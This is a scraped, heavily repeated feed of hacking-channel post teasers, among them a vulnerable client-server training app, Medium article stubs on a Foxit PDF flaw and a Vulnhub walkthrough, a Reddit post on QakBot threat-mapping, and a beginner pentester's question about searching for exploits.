* vucsa-server – vulnerable server for terminal use
Data Structure
Messages transmitted between server and client have the following simple format:
[type][target][length][payload]
32b 32b 32b ???
These four parts have the following meaning:
* type – type of the message (used for serialization/deserialization)
* target – target handler that will receive the message
* length – length of the payload
* payload – data serialized into bytes
Click Here To Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
VuCSA:Vulnerable Client-Server Application Made For Learning/Presenting
Vulnerable client-server application (VuCSA) is made for learning/presenting how to perform penetration tests of non-http thick clients.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
GhostShell — Execute Commands Anonymously
https://cdn-images-1.medium.com/max/627/1*eVTg7F0Us18HOD4hc24RWg.png
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
GhostShell — Execute Commands Anonymously
https://cdn-images-1.medium.com/max/627/1*eVTg7F0Us18HOD4hc24RWg.png
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
GhostShell — Execute Commands Anonymously
Introduction
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Foxit PDF Reader: Schadcode-Attacken über präparierte PDFs möglich
https://cdn-images-1.medium.com/max/1880/0*wdmWXbm5AXVm-u-e.jpg
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Foxit PDF Reader: Schadcode-Attacken über präparierte PDFs möglich
https://cdn-images-1.medium.com/max/1880/0*wdmWXbm5AXVm-u-e.jpg
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Foxit PDF Reader: Schadcode-Attacken über präparierte PDFs möglich
Die Foxit-Entwickler haben in ihren PDF-Anwendungen unter macOS und Windows Sicherheitslücken geschlossen. Angreifer könnten Nutzern von Foxit PDF Reader und PDF Editor mit Schadcode versehene PDF…
Testing for QakBot’s most recent techniques
https://www.reddit.com/r/redteamsec/comments/yu5mmh/testing_for_qakbots_most_recent_techniques/
Recovering purple teamer here, now leading CTI at Tidal Cyber. My role involves building freely available resources relevant for red, blue, & purple teamers. Last week I pushed a bunch of new threat maps to our community edition (no login required) - the goal is you can easily pivot or overlay offensive and/or defensive capabilities on top of these maps to see a) what you could readily test or b) where gaps exist that could be filled with custom tests/detections. This map shows the most recent techniques associated with QakBot, which I built based on a bunch of recent public CTI reports (sourcing throughout, and you can pivot to my notes with procedural details). I already overlaid Atomic Red Team's testing coverage on top, but you can modify this or add other testing capabilities like Scythe or AttackIQ: https://app.tidalcyber.com/share/47cf91c6-2afd-4027-9a00-cda5058cd41a A new US HHS report (https://www.hhs.gov/sites/default/files/venus-ransomware-analyst-note.pdf) out Thursday detailed a bunch of techniques associated with Venus ransomware. I made another custom map around those, and a few more for other ransomware threatening US healthcare orgs this year, none of which are yet defined in ATT&CK. The combined view for those 5 ransomware (60 techniques total) looks like this: https://app.tidalcyber.com/share/09809998-6c73-4208-a507-8c1ca1b311e9 The Community Spotlight (https://app.tidalcyber.com/community-spotlight) has all of the sub-components of those combined maps you can look at individually, and plenty of others. Let me know if I can look at making any others based on recent threats you'd like to see (or give it a go yourself and we can highlight your work in the spotlight). submitted by /u/Trop_Chaud (https://www.reddit.com/user/Trop_Chaud)
[link] (https://www.reddit.com/r/redteamsec/comments/yu5mmh/testing_for_qakbots_most_recent_techniques/) [comments] (https://www.reddit.com/r/redteamsec/comments/yu5mmh/testing_for_qakbots_most_recent_techniques/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/yu5mmh/testing_for_qakbots_most_recent_techniques/
Recovering purple teamer here, now leading CTI at Tidal Cyber. My role involves building freely available resources relevant for red, blue, & purple teamers. Last week I pushed a bunch of new threat maps to our community edition (no login required) - the goal is you can easily pivot or overlay offensive and/or defensive capabilities on top of these maps to see a) what you could readily test or b) where gaps exist that could be filled with custom tests/detections. This map shows the most recent techniques associated with QakBot, which I built based on a bunch of recent public CTI reports (sourcing throughout, and you can pivot to my notes with procedural details). I already overlaid Atomic Red Team's testing coverage on top, but you can modify this or add other testing capabilities like Scythe or AttackIQ: https://app.tidalcyber.com/share/47cf91c6-2afd-4027-9a00-cda5058cd41a A new US HHS report (https://www.hhs.gov/sites/default/files/venus-ransomware-analyst-note.pdf) out Thursday detailed a bunch of techniques associated with Venus ransomware. I made another custom map around those, and a few more for other ransomware threatening US healthcare orgs this year, none of which are yet defined in ATT&CK. The combined view for those 5 ransomware (60 techniques total) looks like this: https://app.tidalcyber.com/share/09809998-6c73-4208-a507-8c1ca1b311e9 The Community Spotlight (https://app.tidalcyber.com/community-spotlight) has all of the sub-components of those combined maps you can look at individually, and plenty of others. Let me know if I can look at making any others based on recent threats you'd like to see (or give it a go yourself and we can highlight your work in the spotlight). submitted by /u/Trop_Chaud (https://www.reddit.com/user/Trop_Chaud)
[link] (https://www.reddit.com/r/redteamsec/comments/yu5mmh/testing_for_qakbots_most_recent_techniques/) [comments] (https://www.reddit.com/r/redteamsec/comments/yu5mmh/testing_for_qakbots_most_recent_techniques/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Testing for QakBot’s most recent techniques
Recovering purple teamer here, now leading CTI at Tidal Cyber. My role involves building freely available resources relevant for red, blue, &...
hacking: security in practice
How powerful is the skill of knowing how to search for stuff?
I know and heard of a lot of pentesters who search for a ton of stuff most of the time and have a pretty low skill in hacking.
Of course, you need some basic skills, the classic linux, networking, active directory, some coding etc and you will learn how things work as you gain experience.
But a lot of hackers simply learn some basic skills and then google for exploits, vulns, tools, and other stuff that others made.
To be honest it is pretty simple to hack stuff when you have so much information available.
Of course, I don't want to be a simple script kiddie, but as a beginner myself I was wondering if I should focus my efforts on searching for stuff with google dorks and other osint stuff like that at this level.
I am going to be a web app pentester in a few months and this is my first real-life experience with hacking and my superior colleagues who both have OSCP said that they mostly google stuff.
What do you think ?
submitted by /u/Agent_B99
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How powerful is the skill of knowing how to search for stuff?
I know and heard of a lot of pentesters who search for a ton of stuff most of the time and have a pretty low skill in hacking.
Of course, you need some basic skills, the classic linux, networking, active directory, some coding etc and you will learn how things work as you gain experience.
But a lot of hackers simply learn some basic skills and then google for exploits, vulns, tools, and other stuff that others made.
To be honest it is pretty simple to hack stuff when you have so much information available.
Of course, I don't want to be a simple script kiddie, but as a beginner myself I was wondering if I should focus my efforts on searching for stuff with google dorks and other osint stuff like that at this level.
I am going to be a web app pentester in a few months and this is my first real-life experience with hacking and my superior colleagues who both have OSCP said that they mostly google stuff.
What do you think ?
submitted by /u/Agent_B99
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How powerful is the skill of knowing how to search for stuff?
I know and heard of a lot of pentesters who search for a ton of stuff most of the time and have a pretty low skill in hacking. Of course, you...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Vulnhub — The Planets: Earth
https://cdn-images-1.medium.com/max/1366/1*_5i2tRjbQm1D7SnlCKIQkw.png
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Vulnhub — The Planets: Earth
https://cdn-images-1.medium.com/max/1366/1*_5i2tRjbQm1D7SnlCKIQkw.png
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Vulnhub — The Planets: Earth
Introduction